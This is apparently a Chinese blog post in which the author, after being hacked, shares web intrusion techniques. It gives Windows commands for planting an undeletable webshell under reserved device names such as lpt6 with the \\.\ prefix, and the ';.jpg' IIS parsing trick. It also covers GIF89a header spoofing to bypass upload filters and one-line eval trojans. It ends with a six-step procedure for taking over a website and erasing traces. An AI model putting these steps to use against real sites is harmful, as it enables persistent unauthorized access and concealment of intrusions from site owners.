zoukankan      html  css  js  c++  java
  • 最近总被黑。然后。。发现了很多知识值得学习。。分享出来。

    畸形文件
     
    利用系统保留文件名创建无法删除的webshell2012/11/20 04:14 P.M.Windows 下不能够以下面这些字样来命名文件/文件夹:
    aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9 
     但是通过cmd的copy命令即可实现: 
    创建时。可试着用引号
     D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\lpt6.80sec.asp    前面必须有 \\.\ 
    删除记得引号。
    写入内容
    echo      hello>\\.\E:\lpt4.xj.asp;.jpg
    显示内容
    type \\.\E:\lpt4.xj.asp;.jpg
     
    方法。理解。
    \\.\
    加..\
    加""
    特殊BUG渠道
    查看可用ren 更名。然后查看内容。
     
    eve 方法。执行语句。注意各大上传入口。只要上传这一句。就可以拿下网站。

    Gif89a 语句欺骗IIS 解析成图片。

    黑方法。

    1.准备大马。

    2.准备扫描。

    3.突破口找到,上传一句话木马。

    4.头欺骗。绕过上传过滤。制作上传入口。可利用一句话木马创建

    5.上传大马。

    6.清理痕迹。

  • 相关阅读:
    计算最大公约数 Exercise05_14
    求满足n^2>12000的n的最大值 Exercise05_13
    依赖注入(DI)
    spring容器
    基于xml文件的bean的配置
    小试牛刀 spring的HelloWorld
    spring 装配Bean
    spring介绍
    hibernate相关类与接口
    hibernate 预习
  • 原文地址:https://www.cnblogs.com/Jlasp/p/3079227.html
Copyright © 2011-2022 走看看